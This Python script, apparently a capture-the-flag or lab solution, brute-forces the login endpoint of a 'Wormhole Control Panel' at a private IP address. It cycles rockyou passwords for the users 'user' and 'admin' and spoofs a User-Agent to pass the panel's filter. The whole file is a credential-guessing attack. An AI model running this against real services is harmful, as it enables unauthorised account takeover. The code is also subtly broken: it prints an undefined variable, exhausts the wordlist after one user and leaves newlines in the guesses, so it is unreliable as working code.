import requests
import json
import os

#{
#    "service": "Wormhole Control Panel",
#    "endpoints": {
#        "\/terminal.php?action=info": "Public info",
#        "\/terminal.php?action=login": "POST: username,password",
#        "\/terminal.php?action=pin": "POST: attempt PIN to get temporary admin token",
#        "\/terminal.php?action=status": "GET: wormhole status",
#        "\/terminal.php?action=close": "POST: close wormhole"
#    },
#    "note": "This panel only answers to terminal user agents. Use the endpoints to fully close the wormhole."
#}  

def main():
    wordlist = "/usr/share/wordlists/rockyou.txt"
    url = "10.81.152.59"
    proto = "http"
    target = "terminal.php?action=login"
    user_agent = "secretcomputer"
    headers = {"User-Agent": user_agent}
    username = ["user", "admin"]

    lines = int(os.popen(f"wc -l {wordlist}").read().split()[0])
    print(lines)
    count = 0

    try:
        with open(wordlist, 'r') as file:
            for user in username:
                for word in file:
                    count += 1
                    print(f"Bruteforce in progress: {count/2/lines:0.000000f}%", end="\r")
                    data = {"username": user, "password": word}
                    response = requests.post(f"{proto}://{url}/{target}", data=data, headers=headers).json()
                    if isinstance(response, dict):
                        if response["status"] != "fail":
                            print(f"Credentials found: {user}:{password}")
    except FileNotFoundError:
        print("File not found")
        return
    except Exception as e:
        print(f"An Error occured: {e}")
        return

if __name__ == "__main__":
    main()